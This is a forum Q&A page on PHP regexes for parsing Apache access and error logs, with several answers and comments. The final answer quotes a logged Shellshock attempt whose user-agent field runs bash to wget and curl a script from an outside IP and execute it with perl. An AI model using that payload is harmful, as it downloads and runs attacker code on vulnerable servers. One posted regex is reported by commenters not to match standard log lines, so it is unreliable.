31

I need to save data in a table (for reporting, stats, etc.) so a user can search by time, user agent, etc. I have a script that runs every day, reads the Apache log, and inserts it into the database.

Log format:

10.1.1.150 - - [29/September/2011:14:21:49 -0400] "GET /info/ HTTP/1.1" 200 9955 "http://www.domain.com/download/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"

My regex:

preg_match('/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) (\".*?\") (\".*?\")$/',$log, $matches);

Now when I print:

print_r($matches);

Array
(
    [0] => 10.1.1.150 - - [29/September/2011:14:21:49 -0400] "GET /info/ HTTP/1.1" 200 9955 "http://www.domain.com/download/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
    [1] => 10.1.1.150
    [2] => -
    [3] => -
    [4] => 29/September/2011
    [5] => 14:21:49
    [6] => -0400
    [7] => GET
    [8] => /info/
    [9] => HTTP/1.1
    [10] => 200
    [11] => 9955
    [12] => "http://www.domain.com/download/"
    [13] => "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
)

The referrer comes back as "http://www.domain.com/download/", quotes included, and the same happens for the user agent. How can I get rid of these " in the regex? Bonus: is there a quick way to insert the date/time easily?

Thanks

3
  • This is a duplicate of question #2221636 Commented Nov 17, 2011 at 18:27
  • I've written a simple helper class for this. See github.com/Spudley/ApacheLogIterator Commented Aug 17, 2012 at 12:38
  • @SDC: Thanks Simon, that iterator is awesome! Commented Sep 12, 2014 at 8:18

5 Answers 5

47

To parse an Apache access_log in PHP, you can use this regex:

$regex = '/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/';
preg_match($regex ,$log, $matches);
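For the bonus part of the question (the date/time), here is a minimal sketch rather than a definitive implementation. It assumes the three date-related groups of the regex above are glued back together and handed to DateTime::createFromFormat, and that the target column is a UTC DATETIME. The variable names ($raw, $when, $sqlDatetime) are made up for illustration.

```php
<?php
// Sample line from the question.
$log = '10.1.1.150 - - [29/September/2011:14:21:49 -0400] "GET /info/ HTTP/1.1" 200 9955 "http://www.domain.com/download/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"';

// Access-log regex from this answer (quotes kept outside the capture groups).
$regex = '/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/';

if (preg_match($regex, $log, $matches) !== 1) {
    throw new RuntimeException('Log line did not match');
}

// Rebuild "29/September/2011:14:21:49 -0400" from groups 4, 5 and 6.
$raw = $matches[4] . ':' . $matches[5] . ' ' . $matches[6];

// "M" accepts both abbreviated and full month names when parsing;
// "O" parses a UTC offset such as -0400.
$when = DateTime::createFromFormat('d/M/Y:H:i:s O', $raw);
if ($when === false) {
    throw new RuntimeException('Unparseable date: ' . $raw);
}

// Assumption: the database column stores UTC.
$when->setTimezone(new DateTimeZone('UTC'));
$sqlDatetime = $when->format('Y-m-d H:i:s');

echo $sqlDatetime, PHP_EOL;
```

The resulting string can be bound as a parameter in a prepared INSERT statement. Normalising to UTC is only one option; storing the original offset alongside it may suit some reports better.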

To match the Apache error_log format, you can use this regex:

$regex = '/^\[([^\]]+)\] \[([^\]]+)\] (?:\[client ([^\]]+)\])?\s*(.*)$/i';
preg_match($regex, $log, $matches);
// $matches[1] = date and time,            $matches[2] = severity,
// $matches[3] = client addr (if present), $matches[4] = log message

It matches lines with or without the client:

[Tue Feb 28 11:42:31 2012] [notice] Apache/2.4.1 (Unix) mod_ssl/2.4.1 OpenSSL/0.9.8k PHP/5.3.10 configured -- resuming normal operations
[Tue Feb 28 14:34:41 2012] [error] [client 192.168.50.10] Symbolic link not allowed or link target not accessible: /usr/local/apache2/htdocs/x.js
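As a rough illustration, the error_log regex can be run over both sample lines like this. The array keys (time, severity, client, message) and the $parsed variable are names chosen for this sketch only.

```php
<?php
// error_log regex from this answer.
$regex = '/^\[([^\]]+)\] \[([^\]]+)\] (?:\[client ([^\]]+)\])?\s*(.*)$/i';

// The two sample lines shown above.
$lines = [
    '[Tue Feb 28 11:42:31 2012] [notice] Apache/2.4.1 (Unix) mod_ssl/2.4.1 OpenSSL/0.9.8k PHP/5.3.10 configured -- resuming normal operations',
    '[Tue Feb 28 14:34:41 2012] [error] [client 192.168.50.10] Symbolic link not allowed or link target not accessible: /usr/local/apache2/htdocs/x.js',
];

$parsed = [];
foreach ($lines as $line) {
    if (preg_match($regex, $line, $m) === 1) {
        $parsed[] = [
            'time'     => $m[1],
            'severity' => $m[2],
            // The optional client group comes back as '' when it is absent.
            'client'   => $m[3] !== '' ? $m[3] : null,
            'message'  => $m[4],
        ];
    }
}

print_r($parsed);
```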

2 Comments

Just a heads up, your regex fails for misconfigured user agents such as \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36\". Yes, someone forgot to properly set their own user agent.
Using "(.*?)" as the last capture group and removing the end-of-line anchor $ avoids the hiccup mentioned above.
3

If you don't want to capture the double quotes, move them out of the capture groups.

 (\".*?\") 

Should become:

 \"(.*?)\"

As an alternative, you could just post-process the entries with trim($str, '"').
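Both options can be sketched side by side. The sample value is the referrer from the question; $captured, $viaRegex and $viaTrim are illustrative names.

```php
<?php
// A referrer as captured by the original (\".*?\") group, quotes included.
$captured = '"http://www.domain.com/download/"';

// Option 1: keep the quotes outside the capture group.
preg_match('/\"(.*?)\"/', $captured, $m);
$viaRegex = $m[1];

// Option 2: post-process with trim(), which strips the given
// characters from both ends of the string.
$viaTrim = trim($captured, '"');

var_dump($viaRegex === $viaTrim);
```

Note that trim() removes every leading and trailing quote, so a value that legitimately begins or ends with a quote character would lose it too.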


3

Having seen (and written) so much erroneous log parsing, here is a hopefully valid regex, tested on 50k lines of logs without a single diff, knowing that:

  • auth_user can have spaces
  • response_size can be -
  • http_start_line can contain one space (HTTP/0.9) or two
  • http_start_line may contain double quotes
  • referrer can be empty, have spaces, or double quotes (it's just an HTTP header)
  • user_agent can be empty too, or contain double quotes, and spaces
  • It's hard to distinguish between referrer and user-agent; let's just hope the " " between them is discriminating enough. Yet the infamous " " can also appear inside the referrer or the user-agent, so basically, we're screwed here.

    $ncsa_re = '/^(?P<IP>\S+)
    \ (?P<ident>\S+) # Usually a single -, but may be longer
    \ (?P<auth_user>.*?) # Spaces are allowed here, can be empty.
    \ (?P<date>\[[^]]+\])
    \ "(?P<http_start_line>.+\ .+)" # At least one space: HTTP 0.9 (escaped, as the x flag ignores bare spaces)
    \ (?P<status_code>[0-9]+) # Status code is _always_ an integer
    \ (?P<response_size>(?:[0-9]+|-)) # Response size can be -
    \ "(?P<referrer>.*)" # Referrer can contain anything: it is just a header
    \ "(?P<user_agent>.*)"$/x';
    

Hope that helps.
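A minimal usage sketch of the named groups follows, run against the sample line from the question. The pattern here is a variation on the one above, under two assumptions: ident is matched with \S+, and the space inside the request line is escaped because the x flag ignores bare whitespace. $fields is a name chosen for this example.

```php
<?php
// Variation of the extended-mode (x flag) pattern from this answer.
$ncsa_re = '/^(?P<IP>\S+)
    \ (?P<ident>\S+)
    \ (?P<auth_user>.*?)
    \ (?P<date>\[[^]]+\])
    \ "(?P<http_start_line>.+\ .+)"
    \ (?P<status_code>[0-9]+)
    \ (?P<response_size>(?:[0-9]+|-))
    \ "(?P<referrer>.*)"
    \ "(?P<user_agent>.*)"$/x';

$log = '10.1.1.150 - - [29/September/2011:14:21:49 -0400] "GET /info/ HTTP/1.1" 200 9955 "http://www.domain.com/download/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"';

$fields = [];
if (preg_match($ncsa_re, $log, $m) === 1) {
    // preg_match returns each named group under both its name and its
    // numeric index; keep only the string keys.
    $fields = array_filter($m, 'is_string', ARRAY_FILTER_USE_KEY);
}

print_r($fields);
```

Named groups keep the calling code readable ($fields['referrer'] instead of $m[8]) and mean that adding a group later does not shift the indexes of the others.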

2 Comments

What is the ?P in your regex? I haven't found anything that uses regex that recognizes that, it just gets flagged as an error.
@mutatron it's a named capture. Search for "named group" or "named capture group".
1

Your regex is wrong. You should use this one instead:

/^(\S+) (\S+) (\S+) - \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/

3 Comments

Could you expand on where and why was it wrong? (This will help ensure the same mistake isn't repeated in the future) :)
I second that. No explanation is included as to why the regex is wrong.
Moreover, it doesn't match on a standard Apache log line. Ignore this one.
0

I tried a couple of the regexes here in Jan 2015 and found that a request from a bad bot does not match in my apache2 log.

The bad bot line is a Bash hack attempt, and I haven't tried to work out the regex correction yet:

199.217.117.211 - - [18/Jan/2015:10:52:27 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""
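One possible adjustment, offered as a sketch and not as a tested fix for every log: the "([^"]*)" groups used in the other answers stop at the first embedded quote. Assuming embedded quotes are always written as \" (as in the line above), the quoted fields can be allowed to contain backslash-escaped characters. The variable names are illustrative.

```php
<?php
// The log line from this answer; in a single-quoted PHP string, \" stays
// as a literal backslash followed by a quote.
$log = '199.217.117.211 - - [18/Jan/2015:10:52:27 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""';

// Inside a quoted field, accept either a character that is neither a quote
// nor a backslash, or a backslash followed by any character.
$quoted = '"((?:[^"\\\\]|\\\\.)*)"';

$regex = '/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] "(\S+) (.*?) (\S+)" (\S+) (\S+) '
       . $quoted . ' ' . $quoted . '$/';

$matched   = preg_match($regex, $log, $matches);
$referrer  = $matches[12] ?? null;
$userAgent = $matches[13] ?? null;

var_dump($matched, $referrer, $userAgent);
```

The captured user agent still contains the \" sequences. Whether to unescape them before storing is a separate decision.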
